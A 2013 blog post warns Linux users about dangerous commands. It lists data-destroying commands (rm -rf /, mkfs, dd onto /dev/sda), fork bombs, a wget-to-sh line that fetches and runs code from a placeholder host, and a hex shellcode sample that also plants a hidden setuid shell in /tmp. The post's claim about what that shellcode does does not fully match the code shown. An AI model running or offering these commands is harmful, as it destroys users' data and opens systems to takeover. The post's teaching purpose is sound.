Thursday, September 26, 2013: For Linux users, it is important to have some basic understanding about malicious commands that can make your life difficult if executed. You need to cautious while running one of these commands. It is also important to always enable a screensaver allocating a password so that a casual passerby cannot maliciously apply one of these commands from your keyboard when you are not on your pc.
Listed below are some common examples of risky linux commands. Remember, they are extremely dangerous and thus should not be tried on any pc with a valuable data. Most of these commands can cause you damage from a LiveCD environment as well.
Delete all files, delete current directory, or delete visible files in current directory
. rm means remove, -f indicates "force" deletion (even if write protected), and -r means do it recursively, i.e. all subfolders. Therefore, " rm -rf / " indicate a force removal of everything in the root directory as well as all subfolders. " rm -rf . " means to force deletion of the existing directory and all subfolders. " rm -rf * " means to force deletion of all files in the existing folder and all subfolders.
rm -rf /
rm -rf .
rm -rf *
Reformat Data on device
Whatever comes after the mkfs command will be damaged and replaced with a blank filesystem.
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation
These commands are used to write raw data on a block device. Often this will hit the filesystem and cause complete loss of data:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb
Though they look quite fascinating, these commands implement enormous processes until the system freezes, which may force a hard reset of the pc. This may cause data corruption or operating system damage).
• In Bourne-ish shells (like Bash):
:(){:|:&};:
• In Perl
fork while fork
Tarbomb
Someone asks you to get a tar archive into the current directory, which can be crafted to burst out a million files, or inject files into the system by deducing filenames. It’s highly recommended that you decompress tar archives to a clean directory. Only after determining that the extracted files are what was expected should the extracted files be copied to the final target directory.
Decompression bombs
Someone asks you to extract an archive that looks like a small download. Actually, it’s highly compressed data that will blow up to hundreds of GB's, filling your hard drive. Avoid downloading and extracting any data, utility, or software from an unreliable source.
Malicious code in Shell scripts
You get a source from someone for a shell script (which is executable from the command line interface using script execution command ./ ) You are told that recommends that to download and execute it. The script might have any command benign or malevolent. Never execute code from unreliable .For example:
wget http://some_place/some_file
sh ./some_file
or
wget http://some_place/some_file -O- | sh
Malicious source code to be compiled then executed
You get a source code from someone and are asked to compile it. Do you know it’s easy to hide malicious code as a part of a large pile of source code? Avoid compiling or executing the resulting compiled code unless it is from some trustworthy application received from a reputable site. For example, in the downloaded code, was this malicious payload:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Which looks like the "hex code gibberish stuff" to the new or even a somewhat experienced computer user, However, it actually runs
rm -rf ~ / &
which eventually destroys your home directory as a regular user, and all your files if you are logged in as root.
This is thanks to EFYTimes listed here.. http://www.efytimes.com/e1/fullnews.asp?edid=116920 |
|
Comments